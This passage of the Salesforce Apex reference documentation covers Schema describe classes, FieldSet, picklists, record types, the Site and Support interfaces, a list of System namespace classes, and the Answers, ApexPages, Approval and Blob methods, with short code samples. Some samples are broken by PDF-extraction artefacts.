This example shows how to call the Schema.describeTabs method to get describe information for all available apps. This example
iterates through each describe result and gets more metadata information for the Sales app.
// App we're interested to get more info about
String appName = 'Sales';
// Get tab set describes for each app
List<Schema.DescribeTabSetResult> tabSetDesc = Schema.describeTabs();
// Iterate through each tab set describe for each
for(Schema.DescribeTabSetResult tsr : tabSetDesc)
// Get more information for the Sales app
if (tsr.getLabel() == appName) {
// Find out if the app is selected
if (tsr.isSelected()) {
System.debug('The ' + appName + ' app
}
// Get the app's Logo URL and namespace
String logo = tsr.getLogoUrl();
System.debug('Logo URL: ' + logo);
String ns = tsr.getNamespace();
if (ns == '') {
System.debug('The ' + appName + ' app
}
else {
System.debug('Namespace: ' + ns);
}
// Get the number of tabs
System.debug('The ' + appName + ' app has
}
}
//
//
//
//
//
is selected. ');
DescribeTabSetResult Methods
The following are methods for DescribeTabSetResult. All are instance methods.
IN THIS SECTION:
getLabel()
Returns the display label for the standard or custom app.
getLogoUrl()
Returns a fully qualified URL to the logo image associated with the standard or custom app.
getNamespace()
Returns the developer namespace prefix of a Force.comAppExchange managed package.
1315
Reference
DescribeTabSetResult Class
getTabs()
Returns metadata information about the standard or custom apps displayed tabs.
isSelected()
Returns true if this standard or custom app is the users currently selected app. Otherwise, returns false.
getLabel()
Returns the display label for the standard or custom app.
Signature
public String getLabel()
Return Value
Type: String
Usage
The display label changes when tabs are renamed in the Salesforce user interface. See the Salesforce online help for more information.
getLogoUrl()
Returns a fully qualified URL to the logo image associated with the standard or custom app.
Signature
public String getLogoUrl()
Return Value
Type: String
getNamespace()
Returns the developer namespace prefix of a Force.comAppExchange managed package.
Signature
public String getNamespace()
Return Value
Type: String
Usage
This namespace prefix corresponds to the namespace prefix of the Developer Edition organization that was enabled to allow publishing
a managed package. This method applies to a custom app containing a set of tabs and installed as part of a managed package.
1316
Reference
DisplayType Enum
getTabs()
Returns metadata information about the standard or custom apps displayed tabs.
Signature
public List<Schema.DescribeTabResult> getTabs()
Return Value
Type: List<Schema.DescribeTabResult>
isSelected()
Returns true if this standard or custom app is the users currently selected app. Otherwise, returns false.
Signature
public Boolean isSelected()
Return Value
Type: Boolean
DisplayType Enum
A Schema.DisplayType enum value is returned by the field describe result's getType method.
Namespace
Schema
Type Field Value
anytype
Any value of the following types: String, Picklist, Boolean, Integer, Double,
Percent, ID, Date, DateTime, URL, or Email.
base64
Boolean
Combobox
Comboboxes, which provide a set of enumerated values and allow the user to specify a value
not in the list
Currency
Currency values
Date values
DateTime
DateTime values
Double
Double values
1317
Reference
FieldSet Class
Email addresses
EncryptedString
Encrypted string
ID
Integer
Integer values
MultiPicklist
Multi-select picklists, which provide a set of enumerated values from which multiple values can
be selected
Percent
Percent values
Phone
Phone numbers. Values can include alphabetic characters. Client applications are responsible for
phone number formatting.
Picklist
Single-select picklists, which provide a set of enumerated values from which only one value can
be selected
Reference
String
String values
TextArea
Time
Time values
URL
Usage
For more information, see Field Types in the Object Reference for Salesforce and Force.com. For more information about the methods
shared by all enums, see Enum Methods.
FieldSet Class
Contains methods for discovering and retrieving the details of field sets created on sObjects.
Namespace
Schema
Usage
Use the methods in the Schema.FieldSet class to discover the fields contained within a field set, and get details about the field
set itself, such as the name, namespace, label, and so on. The following example shows how to get a collection of field set describe result
objects for an sObject. The key of the returned Map is the field set name, and the value is the corresponding field set describe result.
Map<String, Schema.FieldSet> FsMap =
Schema.SObjectType.Account.fieldSets.getMap();
1318
Reference
FieldSet Class
Field sets are also available from sObject describe results. The following lines of code are equivalent to the prior sample:
Schema.DescribeSObjectResult d =
Account.sObjectType.getDescribe();
Map<String, Schema.FieldSet> FsMap =
d.fieldSets.getMap();
To work with an individual field set, you can access it via the map of field sets on an sObject or, when you know the name of the field
set in advance, using an explicit reference to the field set. The following two lines of code retrieve the same field set:
Schema.FieldSet fs1 = Schema.SObjectType.Account.fieldSets.getMap().get('field_set_name');
Schema.FieldSet fs2 = Schema.SObjectType.Account.fieldSets.field_set_name;
1319
Reference
FieldSet Class
</apex:repeat>
</apex:pageBlockSection>
</apex:pageBlock>
</apex:form>
</apex:page>
One thing to note about the above markup is the expression used to determine if a field on the form should be indicated as being a
required field. A field in a field set can be required by either the field set definition, or the fields own definition. The expression handles
both cases.
FieldSet Methods
The following are methods for FieldSet. All are instance methods.
IN THIS SECTION:
getDescription()
Returns the field sets description.
getFields()
Returns a list of Schema.FieldSetMember objects for the fields making up the field set.
getLabel()
Returns the text label that is displayed next to the field in the Salesforce user interface.
getName()
Returns the field sets name.
getNamespace()
Returns the field sets namespace.
getSObjectType()
Returns the Schema.sObjectType of the sObject containing the field set definition.
getDescription()
Returns the field sets description.
Signature
public String getDescription()
Return Value
Type: String
Usage
Description is a required field for a field set, intended to describe the context and content of the field set. Its often intended for
administrators who might be configuring a field set defined in a managed package, rather than for end users.
1320
Reference
FieldSet Class
getFields()
Returns a list of Schema.FieldSetMember objects for the fields making up the field set.
Signature
public List<FieldSetMember> getFields()
Return Value
Type: List<Schema.FieldSetMember>
getLabel()
Returns the text label that is displayed next to the field in the Salesforce user interface.
Signature
public String getLabel()
Return Value
Type: String
getName()
Returns the field sets name.
Signature
public String getName()
Return Value
Type: String
getNamespace()
Returns the field sets namespace.
Signature
public String getNamespace()
Return Value
Type: String
1321
Reference
FieldSetMember Class
Usage
The returned namespace is an empty string if your organization hasnt set a namespace, and the field set is defined in your organization.
Otherwise, its the namespace of your organization, or the namespace of the managed package containing the field set.
getSObjectType()
Returns the Schema.sObjectType of the sObject containing the field set definition.
Signature
public Schema.SObjectType getSObjectType()
Return Value
Type: Schema.SObjectType
FieldSetMember Class
Contains methods for accessing the metadata for field set member fields.
Namespace
Schema
Usage
Use the methods in the Schema.FieldSetMember class to get details about fields contained within a field set, such as the field
label, type, a dynamic SOQL-ready field path, and so on. The following example shows how to get a collection of field set member
describe result objects for a specific field set on an sObject:
List<Schema.FieldSetMember> fields =
Schema.SObjectType.Account.fieldSets.getMap().get('field_set_name').getFields();
If you know the name of the field set in advance, you can access its fields more directly using an explicit reference to the field set:
List<Schema.FieldSetMember> fields =
Schema.SObjectType.Account.fieldSets.field_set_name.getFields();
SEE ALSO:
FieldSet Class
FieldSetMember Methods
The following are methods for FieldSetMember. All are instance methods.
IN THIS SECTION:
getDBRequired()
Returns true if the field is required by the fields definition in its sObject, otherwise, false.
1322
Reference
FieldSetMember Class
getFieldPath()
Returns a field path string in a format ready to be used in a dynamic SOQL query.
getLabel()
Returns the text label thats displayed next to the field in the Salesforce user interface.
getRequired()
Returns true if the field is required by the field set, otherwise, false.
getType()
Returns the fields Apex data type.
getDBRequired()
Returns true if the field is required by the fields definition in its sObject, otherwise, false.
Signature
public Boolean getDBRequired()
Return Value
Type: Boolean
getFieldPath()
Returns a field path string in a format ready to be used in a dynamic SOQL query.
Signature
public String getFieldPath()
Return Value
Type: String
Example
See Displaying a Field Set on a Visualforce Page for an example of how to use this method.
getLabel()
Returns the text label thats displayed next to the field in the Salesforce user interface.
Signature
public String getLabel()
Return Value
Type: String
1323
Reference
PicklistEntry Class
getRequired()
Returns true if the field is required by the field set, otherwise, false.
Signature
public Boolean getRequired()
Return Value
Type: Boolean
getType()
Returns the fields Apex data type.
Signature
public Schema.DisplayType getType()
Return Value
Type: Schema.DisplayType
PicklistEntry Class
Represents a picklist entry.
Namespace
Schema
Usage
Picklist fields contain a list of one or more items from which a user chooses a single item. They display as drop-down lists in the Salesforce
user interface. One of the items can be configured as the default item.
A Schema.PicklistEntry object is returned from the field describe result using the getPicklistValues method. For
example:
Schema.DescribeFieldResult F = Account.Industry.getDescribe();
List<Schema.PicklistEntry> P = F.getPicklistValues();
PicklistEntry Methods
The following are methods for PicklistEntry. All are instance methods.
IN THIS SECTION:
getLabel()
Returns the display name of this item in the picklist.
1324
Reference
PicklistEntry Class
getValue()
Returns the value of this item in the picklist.
isActive()
Returns true if this item must be displayed in the drop-down list for the picklist field in the user interface, false otherwise.
isDefaultValue()
Returns true if this item is the default value for the picklist, false otherwise. Only one item in a picklist can be designated as
the default.
getLabel()
Returns the display name of this item in the picklist.
Signature
public String getLabel()
Return Value
Type: String
getValue()
Returns the value of this item in the picklist.
Signature
public String getValue()
Return Value
Type: String
isActive()
Returns true if this item must be displayed in the drop-down list for the picklist field in the user interface, false otherwise.
Signature
public Boolean isActive()
Return Value
Type: Boolean
isDefaultValue()
Returns true if this item is the default value for the picklist, false otherwise. Only one item in a picklist can be designated as the
default.
1325
Reference
RecordTypeInfo Class
Signature
public Boolean isDefaultValue()
Return Value
Type: Boolean
RecordTypeInfo Class
Contains methods for accessing record type information for an sObject with associated record types.
Namespace
Schema
Usage
A RecordTypeInfo object is returned from the sObject describe result using the getRecordTypeInfos method. For example:
Schema.DescribeSObjectResult R = Account.SObjectType.getDescribe();
List<Schema.RecordTypeInfo> RT = R.getRecordTypeInfos();
In addition to the getRecordTypeInfos method, you can use the getRecordTypeInfosById and the
getRecordTypeInfosByName methods. These methods return maps that associate RecordTypeInfo with record IDs and record
labels, respectively.
Example
The following example assumes at least one record type has been created for the Account object:
RecordType rt = [SELECT Id,Name FROM RecordType WHERE SobjectType='Account' LIMIT 1];
Schema.DescribeSObjectResult d = Schema.SObjectType.Account;
Map<Id,Schema.RecordTypeInfo> rtMapById = d.getRecordTypeInfosById();
Schema.RecordTypeInfo rtById = rtMapById.get(rt.id);
Map<String,Schema.RecordTypeInfo> rtMapByName = d.getRecordTypeInfosByName();
Schema.RecordTypeInfo rtByName = rtMapByName.get(rt.name);
System.assertEquals(rtById,rtByName);
RecordTypeInfo Methods
The following are methods for RecordTypeInfo. All are instance methods.
IN THIS SECTION:
getName()
Returns the name of this record type.
getRecordTypeId()
Returns the ID of this record type.
1326
Reference
RecordTypeInfo Class
isAvailable()
Returns true if this record type is available to the current user, false otherwise. Use this method to display a list of available
record types to the user when he or she is creating a new record.
isDefaultRecordTypeMapping()
Returns true if this is the default record type mapping, false otherwise.
getName()
Returns the name of this record type.
Signature
public String getName()
Return Value
Type: String
getRecordTypeId()
Returns the ID of this record type.
Signature
public ID getRecordTypeId()
Return Value
Type: ID
isAvailable()
Returns true if this record type is available to the current user, false otherwise. Use this method to display a list of available record
types to the user when he or she is creating a new record.
Signature
public Boolean isAvailable()
Return Value
Type: Boolean
isDefaultRecordTypeMapping()
Returns true if this is the default record type mapping, false otherwise.
Signature
public Boolean isDefaultRecordTypeMapping()
1327
Reference
SOAPType Enum
Return Value
Type: Boolean
SOAPType Enum
A Schema.SOAPType enum value is returned by the field describe result getSoapType method.
Namespace
Schema
Type Field Value
anytype
Any value of the following types: String, Boolean, Integer, Double, ID, Date or
DateTime.
base64binary
Boolean
Date
Date values
DateTime
DateTime values
Double
Double values
ID
Integer
Integer values
String
String values
Time
Time values
Usage
For more information, see SOAPTypes in the SOAP API Developer's Guide. For more information about the methods shared by all enums,
see Enum Methods.
SObjectField Class
A Schema.sObjectField object is returned from the field describe result using the getControler and getSObjectField
methods.
Namespace
Schema
1328
Reference
SObjectType Class
Example
Schema.DescribeFieldResult F = Account.Industry.getDescribe();
Schema.sObjectField T = F.getSObjectField();
sObjectField Methods
The following are instance methods for sObjectField.
IN THIS SECTION:
getDescribe()
Returns the describe field result for this field.
getDescribe()
Returns the describe field result for this field.
Signature
public Schema.DescribeFieldResult getDescribe()
Return Value
Type: Schema.DescribeFieldResult
SObjectType Class
A Schema.sObjectType object is returned from the field describe result using the getReferenceTo method, or from the
sObject describe result using the getSObjectType method.
Namespace
Schema
Usage
Schema.DescribeFieldResult F = Account.Industry.getDescribe();
List<Schema.sObjectType> P = F.getReferenceTo();
SObjectType Methods
The following are methods for SObjectType. All are instance methods.
IN THIS SECTION:
getDescribe()
Returns the describe sObject result for this field.
1329
Reference
SObjectType Class
newSObject()
Constructs a new sObject of this type.
newSObject(ID)
Constructs a new sObject of this type, with the specified ID.
newSObject(ID, Boolean)
Constructs a new sObject of this type, and optionally, of the specified record type ID and with default custom field values.
getDescribe()
Returns the describe sObject result for this field.
Signature
public Schema.DescribeSObjectResult getDescribe()
Return Value
Type: Schema.DescribeSObjectResult
newSObject()
Constructs a new sObject of this type.
Signature
public sObject newSObject()
Return Value
Type: sObject
Example
For an example, see Dynamic sObject Creation Example.
newSObject(ID)
Constructs a new sObject of this type, with the specified ID.
Signature
public sObject newSObject(ID Id)
Parameters
Id
Type: ID
1330
Reference
SObjectType Class
Return Value
Type: sObject
Usage
For the argument, pass the ID of an existing record in the database.
After you create a new sObject, the sObject returned has all fields set to null. You can set any updateable field to desired values and
then update the record in the database. Only the fields you set new values for are updated and all other fields which are not system
fields are preserved.
newSObject(ID, Boolean)
Constructs a new sObject of this type, and optionally, of the specified record type ID and with default custom field values.
Signature
public sObject newSObject(ID recordTypeId, Boolean loadDefaults)
Parameters
recordTypeId
Type: ID
Specifies the record type ID of the sObject to create. If no record type exists for this sObject, use null. If the sObject has record
types and you specify null, the default record type is used.
loadDefaults
Type: Boolean
Specifies whether to populate custom fields with their predefined default values (true) or not (false).
Return Value
Type: sObject
Usage
For required fields that have no default values, make sure to provide a value before inserting the new sObject. Otherwise, the insertion
results in an error. An example is the Account Name field or a master-detail relationship field.
Since picklists and multi-select picklists can have default values specified per record type, this method populates the default value
corresponding to the record type specified.
If fields have no predefined default values and the loadDefaults argument is true, this method creates the sObject with
field values of null.
If the loadDefaults argument is false, this method creates the sObject with field values of null.
This method populates read-only custom fields of the new sObject with default values. You can then insert the new sObject with
the read-only fields, even though these fields cannot be edited after theyre inserted.
If a custom field is marked as unique and also provides a default value, inserting more than one new sObject will cause a run-time
exception because of duplicate field values.
To learn more about default field values, see About Default Field Values in the Salesforce online help.
1331
Reference
Site Namespace
Site Namespace
The Site namespace provides an interface for rewriting Sites URLs.
The following is the interface in the Site namespace.
IN THIS SECTION:
UrlRewriter Interface
Enables rewriting Sites URLs.
UrlRewriter Interface
Enables rewriting Sites URLs.
Namespace
Site
Usage
Sites provides built-in logic that helps you display user-friendly URLs and links to site visitors. Create rules to rewrite URL requests typed
into the address bar, launched from bookmarks, or linked from external websites. You can also create rules to rewrite the URLs for links
within site pages. URL rewriting not only makes URLs more descriptive and intuitive for users, it allows search engines to better index
your site pages.
For example, let's say that you have a blog site. Without URL rewriting, a blog entry's URL might look like this:
http://myblog.force.com/posts?id=003D000000Q0PcN
To rewrite URLs for a site, create an Apex class that maps the original URLs to user-friendly URLs, and then add the Apex class to your
site.
1332
Reference
UrlRewriter Interface
UrlRewriter Methods
The following are methods for UrlRewriter. All are instance methods.
IN THIS SECTION:
generateUrlFor(System.PageReference[])
Maps a list of Salesforce URLs to a list of user-friendly URLs.
mapRequestUrl(System.PageReference)
Maps a user-friendly URL to a Salesforce URL.
generateUrlFor(System.PageReference[])
Maps a list of Salesforce URLs to a list of user-friendly URLs.
Signature
public System.PageReference[] generateUrlFor(System.PageReference[] urls)
Parameters
urls
Type: System.PageReference[]
Return Value
Type: System.PageReference[]
Usage
You can use List<PageReference> instead of PageReference[], if you prefer.
Important: The size and order of the input list of Salesforce URLs must exactly correspond to the size and order of the generated
list of user-friendly URLs. The generateUrlFor method maps input URLs to output URLs based on the order in the lists.
mapRequestUrl(System.PageReference)
Maps a user-friendly URL to a Salesforce URL.
Signature
public System.PageReference mapRequestUrl(System.PageReference url)
Parameters
url
Type: System.PageReference
Return Value
Type: System.PageReference
1333
Reference
Support Namespace
Support Namespace
The Support namespace provides an interface used for Case Feed.
The following is the interface in the Support namespace.
IN THIS SECTION:
EmailTemplateSelector Interface
The Support.EmailTemplateSelector interface enables providing default email templates in Case Feed. With default
email templates, specified email templates are preloaded for cases based on criteria such as case origin or subject.
MilestoneTriggerTimeCalculator Interface
The Support.MilestoneTriggerTimeCalculator interface calculates the time trigger for a milestone.
EmailTemplateSelector Interface
The Support.EmailTemplateSelector interface enables providing default email templates in Case Feed. With default email
templates, specified email templates are preloaded for cases based on criteria such as case origin or subject.
Namespace
Support
To specify default templates, you must create a class that implements Support.EmailTemplateSelector.
When you implement this interface, provide an empty parameterless constructor.
IN THIS SECTION:
EmailTemplateSelector Methods
EmailTemplateSelector Example Implementation
EmailTemplateSelector Methods
The following are methods for EmailTemplateSelector.
IN THIS SECTION:
getDefaultTemplateId(ID)
Returns the ID of the email template to preload for the case currently being viewed in the case feed using the specified case ID.
getDefaultTemplateId(ID)
Returns the ID of the email template to preload for the case currently being viewed in the case feed using the specified case ID.
Signature
public ID getDefaultTemplateId(ID caseId)
1334
Reference
EmailTemplateSelector Interface
Parameters
caseId
Type: ID
Return Value
Type: ID
1335
Reference
MilestoneTriggerTimeCalculator Interface
EmailTemplate expectedTemplate =
[SELECT id FROM EmailTemplate WHERE DeveloperName = 'LX1150_template'];
Id expectedTemplateId = expectedTemplate.Id;
System.assertEquals(actualTemplateId, expectedTemplateId);
// Change the case properties to match a different template
c.Subject = 'My LX1220 is overheating';
Database.update(c);
// Make sure the correct template is chosen in this case
actualTemplateId = chooser.getDefaultEmailTemplateId(c.Id);
expectedTemplate =
[SELECT id FROM EmailTemplate WHERE DeveloperName = 'LX1220_template'];
expectedTemplateId = expectedTemplate.Id;
System.assertEquals(actualTemplateId, expectedTemplateId);
}
}
MilestoneTriggerTimeCalculator Interface
The Support.MilestoneTriggerTimeCalculator interface calculates the time trigger for a milestone.
Namespace
Support
Implement the Support.MilestoneTriggerTimeCalculator interface to calculate a dynamic time trigger for a milestone
based on the milestone type, the properties of the case, and case-related objects. To implement the
Support.MilestoneTriggerTimeCalculator interface, you must first declare a class with the implements keyword
as follows:
global class Employee implements Support.MilestoneTriggerTimeCalculator {
Next, your class must provide an implementation for the following method:
global Integer calculateMilestoneTriggerTime(String caseId, String milestoneTypeId)
MilestoneTriggerTimeCalculator Methods
The following are instance methods for MilestoneTriggerTimeCalculator.
1336
Reference
MilestoneTriggerTimeCalculator Interface
IN THIS SECTION:
calculateMilestoneTriggerTime(String, String)
Calculates the milestone trigger time based on the specified case and milestone type and returns the time in minutes.
calculateMilestoneTriggerTime(String, String)
Calculates the milestone trigger time based on the specified case and milestone type and returns the time in minutes.
Syntax
public Integer calculateMilestoneTriggerTime(String caseId, String milestoneTypeId)
Parameters
caseId
Type: String
ID of the case the milestone is applied to.
milestoneTypeId
Type: String
ID of the milestone type.
Return Value
Type: Integer
The calculated trigger time in minutes.
1337
Reference
System Namespace
System Namespace
The System namespace provides classes and methods for core Apex functionality.
The following are the classes in the System namespace.
IN THIS SECTION:
Answers Class
Represents zone answers.
ApexPages Class
Use ApexPages to add and check for messages associated with the current page, as well as to reference the current page.
Approval Class
Contains methods for processing approval requests.
Blob Class
Contains methods for the Blob primitive data type.
1338
Reference
System Namespace
Boolean Class
Contains methods for the Boolean primitive data type.
BusinessHours Class
Use the BusinessHours methods to set the business hours at which your customer support team operates.
Cases Class
Use the Cases class to interact with case records.
Comparable Interface
Adds sorting support for Lists that contain non-primitive types, that is, Lists of user-defined types.
Cookie Class
The Cookie class lets you access cookies for your Force.com site using Apex.
Crypto Class
Provides methods for creating digests, message authentication codes, and signatures, as well as encrypting and decrypting information.
Custom Settings Methods
Custom settings are similar to custom objects and enable application developers to create custom sets of data, as well as create and
associate custom data for an organization, profile, or specific user. All custom settings data is exposed in the application cache, which
enables efficient access without the cost of repeated queries to the database. This data can then be used by formula fields, validation
rules, Apex, and the SOAP API.
Database Class
Contains methods for creating and manipulating data.
Date Class
Contains methods for the Date primitive data type.
Datetime Class
Contains methods for the Datetime primitive data type.
Decimal Class
Contains methods for the Decimal primitive data type.
Double Class
Contains methods for the Double primitive data type.
EncodingUtil Class
Use the methods in the EncodingUtil class to encode and decode URL strings, and convert strings to hexadecimal format.
Enum Methods
An enum is an abstract data type with values that each take on exactly one of a finite set of identifiers that you specify. Apex provides
built-in enums, such as LoggingLevel, and you can define your own enum.
Exception Class and Built-In Exceptions
An exception denotes an error that disrupts the normal flow of code execution. You can use Apex built-in exceptions or create
custom exceptions. All exceptions have common methods.
Http Class
Use the Http class to initiate an HTTP request and response.
HttpCalloutMock Interface
Enables sending fake responses when testing HTTP callouts.
HttpRequest Class
Use the HttpRequest class to programmatically create HTTP requests like GET, POST, PUT, and DELETE.
1339
Reference
System Namespace
HttpResponse Class
Use the HttpResponse class to handle the HTTP response returned by the Http class.
Id Class
Contains methods for the ID primitive data type.
Ideas Class
Represents zone ideas.
InstallHandler Interface
Enables custom code to run after a managed package installation or upgrade.
Integer Class
Contains methods for the Integer primitive data type.
JSON Class
Contains methods for serializing Apex objects into JSON format and deserializing JSON content that was serialized using the
serialize method in this class.
JSONGenerator Class
Contains methods used to serialize objects into JSON content using the standard JSON encoding.
JSONParser Class
Represents a parser for JSON-encoded content.
JSONToken Enum
Contains all token values used for parsing JSON content.
Limits Class
Contains methods that return limit information for specific resources.
List Class
Contains methods for the List collection type.
Long Class
Contains methods for the Long primitive data type.
Map Class
Contains methods for the Map collection type.
Matcher Class
Matchers use Patterns to perform match operations on a character string.
Math Class
Contains methods for mathematical operations.
Messaging Class
Contains messaging methods used when sending a single or mass email.
MultiStaticResourceCalloutMock Class
Utility class used to specify a fake response using multiple resources for testing HTTP callouts.
Network Class
Represents a community.
PageReference Class
A PageReference is a reference to an instantiation of a page. Among other attributes, PageReferences consist of a URL and a set of
query parameter names and values.
1340
Reference
System Namespace
Pattern Class
Represents a compiled representation of a regular expression.
Queueable Interface
Enables the asynchronous execution of Apex jobs that can be monitored.
QueueableContext Interface
Represents the parameter type of the execute() method in a class that implements the Queueable interface and contains
the job ID. This interface is implemented internally by Apex.
QuickAction Class
Use Apex to request and process actions on objects that allow custom fields, on objects that appear in a Chatter feed, or on objects
that are available globally.
RemoteObjectController
Use RemoteObjectController to access the standard Visualforce Remote Objects operations in your Remote Objects
override methods.
ResetPasswordResult Class
Represents the result of a password reset.
RestContext Class
Contains the RestRequest and RestResponse objects.
RestRequest Class
Represents an object used to pass data from an HTTP request to an Apex RESTful Web service method.
RestResponse Class
Represents an object used to pass data from an Apex RESTful Web service method to an HTTP response.
Schedulable Interface
The class that implements this interface can be scheduled to run at different intervals.
SchedulableContext Interface
Represents the parameter type of a method in a class that implements the Schedulable interface and contains the scheduled
job ID. This interface is implemented internally by Apex.
Schema Class
Contains methods for obtaining schema describe information.
Search Class
Used with dynamic SOSL queries.
SelectOption Class
A SelectOption object specifies one of the possible values for a Visualforce selectCheckboxes, selectList, or
selectRadio component.
Set Class
Represents a collection of unique elements with no duplicate values.
Site Class
Use the Site Class to manage your Force.com sites.
sObject Class
Contains methods for the sObject data type.
StaticResourceCalloutMock Class
Utility class used to specify a fake response for testing HTTP callouts.
1341
Reference
Answers Class
String Class
Contains methods for the String primitive data type.
System Class
Contains methods for system operations, such as writing debug messages and scheduling jobs.
Test Class
Contains methods related to Visualforce tests.
Time Class
Contains methods for the Time primitive data type.
TimeZone Class
Represents a time zone. Contains methods for creating a new time zone and obtaining time zone properties, such as the time zone
ID, offset, and display name.
Type Class
Contains methods for getting the Apex type that corresponds to an Apex class and for instantiating new types.
UninstallHandler Interface
Enables custom code to run after a managed package is uninstalled.
URL Class
Represents a uniform resource locator (URL) and provides access to parts of the URL. Enables access to the Salesforce instance URL.
UserInfo Class
Contains methods for obtaining information about the context user.
Version Class
Use the Version methods to get the version of a managed package of a subscriber and to compare package versions.
WebServiceCallout Class
Enables making callouts to SOAP operations on an external Web service. This class is used in the Apex stub class that is auto-generated
from a WSDL.
WebServiceMock Interface
Enables sending fake responses when testing Web service callouts of a class auto-generated from a WSDL.
XmlStreamReader Class
The XmlStreamReader class provides methods for forward, read-only access to XML data. You can pull data from XML or skip
unwanted events.
XmlStreamWriter Class
The XmlStreamWriter class provides methods for writing XML data.
Answers Class
Represents zone answers.
Namespace
System
1342
Reference
Answers Class
Usage
Answers is a feature of the Community application that enables users to ask questions and have community members post replies.
Community members can then vote on the helpfulness of each reply, and the person who asked the question can mark one reply as
the best answer.
For more information on answers, see Answers Overview in the Salesforce online help.
Example
The following example finds questions in an internal zone that have similar titles as a new question:
public class FindSimilarQuestionController {
public static void test() {
// Instantiate a new question
Question question = new Question ();
// Specify a title for the new question
question.title = 'How much vacation time do full-time employees get?';
// Specify the communityID (INTERNAL_COMMUNITY) in which to find similar questions.
Community community = [ SELECT Id FROM Community WHERE Name = 'INTERNAL_COMMUNITY' ];
question.communityId = community.id;
ID[] results = Answers.findSimilar(question);
}
}
Answers Methods
The following are methods for Answers. All methods are static.
IN THIS SECTION:
findSimilar(Question)
Returns a list of similar questions based on the title of the specified question.
setBestReply(String, String)
Sets the specified reply for the specified question as the best reply. Because a question can have multiple replies, setting the best
reply helps users quickly identify the reply that contains the most helpful information.
findSimilar(Question)
Returns a list of similar questions based on the title of the specified question.
1343
Reference
ApexPages Class
Signature
public static ID[] findSimilar(Question q)
Parameters
q
Type: Question
Return Value
Type: ID[]
Usage
Each findSimilar call counts against the SOSL statements governor limit allowed for the process.
setBestReply(String, String)
Sets the specified reply for the specified question as the best reply. Because a question can have multiple replies, setting the best reply
helps users quickly identify the reply that contains the most helpful information.
Signature
public static Void setBestReply(String questionId, String replyId)
Parameters
questionId
Type: String
replyId
Type: String
Return Value
Type: Void
ApexPages Class
Use ApexPages to add and check for messages associated with the current page, as well as to reference the current page.
Namespace
System
Usage
In addition, ApexPages is used as a namespace for the PageReference Class and the Message Class.
1344
Reference
ApexPages Class
ApexPages Methods
The following are methods for ApexPages. All are instance methods.
IN THIS SECTION:
addMessage(sObject)
Add a message to the current page context.
addMessages(Exception)
Adds a list of messages to the current page context based on a thrown exception.
currentPage()
Returns the current page's PageReference.
getMessages()
Returns a list of the messages associated with the current context.
hasMessages()
Returns true if there are messages associated with the current context, false otherwise.
hasMessages(ApexPages.Severity)
Returns true if messages of the specified severity exist, false otherwise.
addMessage(sObject)
Add a message to the current page context.
Signature
public Void addMessage(sObject ApexPages.Message)
Parameters
msg
Type: ApexPages.Message
Return Value
Type: Void
addMessages(Exception)
Adds a list of messages to the current page context based on a thrown exception.
Signature
public Void addMessages(Exception ex)
Parameters
ex
Type: Exception
1345
Reference
ApexPages Class
Return Value
Type: Void
currentPage()
Returns the current page's PageReference.
Signature
public System.PageReference currentPage()
Return Value
Type: System.PageReference
Example
This code segment returns the id parameter of the current page.
public MyController() {
account = [
SELECT Id, Name, Site
FROM Account
WHERE Id =
:ApexPages.currentPage().
getParameters().
get('id')
];
}
getMessages()
Returns a list of the messages associated with the current context.
Signature
public ApexPages.Message[] getMessages()
Return Value
Type: ApexPages.Message[]
hasMessages()
Returns true if there are messages associated with the current context, false otherwise.
Signature
public Boolean hasMessages()
1346
Reference
Approval Class
Return Value
Type: Boolean
hasMessages(ApexPages.Severity)
Returns true if messages of the specified severity exist, false otherwise.
Signature
public Boolean hasMessages(ApexPages.Severity sev)
Parameters
sev
Type: ApexPages.Severity
Return Value
Type: Boolean
Approval Class
Contains methods for processing approval requests.
Namespace
System
Usage
Approval is also used as a namespace for the ProcessRequest and ProcessResult classes.
Approval Methods
The following are methods for Approval. All methods are static.
IN THIS SECTION:
process(Approval.ProcessRequest)
Submits a new approval request and approves or rejects existing approval requests.
process(Approval.ProcessRequest, Boolean)
Submits a new approval request and approves or rejects existing approval requests.
process(Approval.ProcessRequest[])
Submits a list of new approval requests, and approves or rejects existing approval requests.
process(Approval.ProcessRequest [], Boolean)
Submits a list of new approval requests, and approves or rejects existing approval requests.
1347
Reference
Approval Class
process(Approval.ProcessRequest)
Submits a new approval request and approves or rejects existing approval requests.
Signature
public static Approval.ProcessResult process(Approval.ProcessRequest processRequest)
Parameters
processRequest
Type: Approval.ProcessRequest
Return Value
Type: Approval.ProcessResult
Example
// Insert an account
Account a = new Account(Name='Test',
annualRevenue=100.0);
insert a;
// Create an approval request for the account
Approval.ProcessSubmitRequest req1 =
new Approval.ProcessSubmitRequest();
req1.setObjectId(a.id);
// Submit the approval request for the account
Approval.ProcessResult result =
Approval.process(req1);
process(Approval.ProcessRequest, Boolean)
Submits a new approval request and approves or rejects existing approval requests.
Signature
public static Approval.ProcessResult process(Approval.ProcessRequest processRequests,
Boolean opt_allOrNone)
Parameters
processRequests
Approval.ProcessRequest
opt_allOrNone
Type: Boolean
1348
Reference
Blob Class
The optional opt_allOrNone parameter specifies whether the operation allows for partial success. If you specify false for
this parameter and an approval fails, the remainder of the approval processes can still succeed.
Return Value
Approval.ProcessResult
process(Approval.ProcessRequest[])
Submits a list of new approval requests, and approves or rejects existing approval requests.
Signature
public static Approval.ProcessResult [] process(Approval.ProcessRequest[]
processRequests)
Parameters
processRequests
Approval.ProcessRequest []
Return Value
Approval.ProcessResult []
Signature
public static Approval.ProcessResult [] process(Approval.ProcessRequest[]
processRequests, Boolean opt_allOrNone)
Parameters
processRequests
Approval.ProcessRequest []
opt_allOrNone
Type: Boolean
The optional opt_allOrNone parameter specifies whether the operation allows for partial success. If you specify false for
this parameter and an approval fails, the remainder of the approval processes can still succeed.
Return Value
Approval.ProcessResult []
Blob Class
Contains methods for the Blob primitive data type.
1349
Reference
Blob Class
Namespace
System
Usage
For more information on Blobs, see Primitive Data Types on page 26.
Blob Methods
The following are methods for Blob.
IN THIS SECTION:
size()
Returns the number of characters in the Blob.
toPdf(String)
Creates a binary object out of the given string, encoding it as a PDF file.
toString()
Casts the Blob into a String.
valueOf(String)
Casts the specified String to a Blob.
size()
Returns the number of characters in the Blob.
Signature
public Integer size()
Return Value
Type: Integer
Example
String myString = 'StringToBlob';
Blob myBlob = Blob.valueof(myString);
Integer size = myBlob.size();
toPdf(String)
Creates a binary object out of the given string, encoding it as a PDF file.
Signature
public static Blob toPdf(String stringToConvert)
1350
Reference
Blob Class
Parameters
stringToConvert
Type: String
Return Value
Type: Blob
Example
String pdfContent = 'This is a test string';
